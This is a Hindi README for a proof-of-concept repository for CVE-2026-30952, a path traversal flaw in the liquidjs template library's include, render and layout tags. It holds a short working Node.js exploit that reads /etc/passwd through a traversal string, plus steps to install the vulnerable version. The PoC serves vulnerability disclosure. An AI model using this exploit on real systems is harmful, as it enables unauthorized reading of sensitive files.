
PoC for CVE-2026-30952: liquidjs में layout, render, और include टैग्स में निरपेक्ष पथों के माध्यम से Path Traversal भेद्यता।
इस रिपॉजिटरी में CVE-2026-30952 के लिए एक प्रूफ ऑफ कॉन्सेप्ट (PoC) शामिल है, जो liquidjs लाइब्रेरी (संस्करण < 10.25.0) में खोजी गई एक उच्च-गंभीरता वाली पाथ ट्रैवर्सल भेद्यता है।
लेखक और शोधकर्ता:
Moriel Harush Maor Caplan
यह भेद्यता layout, render, और include टैग्स के माध्यम से मनमानी फ़ाइल एक्सेस की अनुमति देती है जब उन्हें निरपेक्ष पथों के साथ उपयोग किया जाता है। यह तब भी होता है जब एक root निर्देशिका निर्दिष्ट की जाती है, क्योंकि लाइब्रेरी का फ़ॉलबैक तंत्र यह सत्यापित करने में विफल रहता है कि हल किया गया पथ इच्छित रूट के भीतर रहता है या नहीं।
प्रभाव: एक हमलावर संवेदनशील फ़ाइलें (जैसे, /etc/passwd, पर्यावरण फ़ाइलें) पढ़ सकता है यदि वह टेम्पलेट सामग्री या इन टैग्स को दिए गए वेरिएबल को नियंत्रित कर सकता है।
const { Liquid } = require('liquidjs');
const e = new Liquid({ root: ['/tmp'], partials: ['/tmp'], dynamicPartials: true });
e.parseAndRender('{% include page %}', { page: '../../../etc/passwd' }).then(o => console.log(o.slice(0,500)));
liquidjs का भेद्य संस्करण (npm install [email protected])npm install चलाएँ।node exploit.js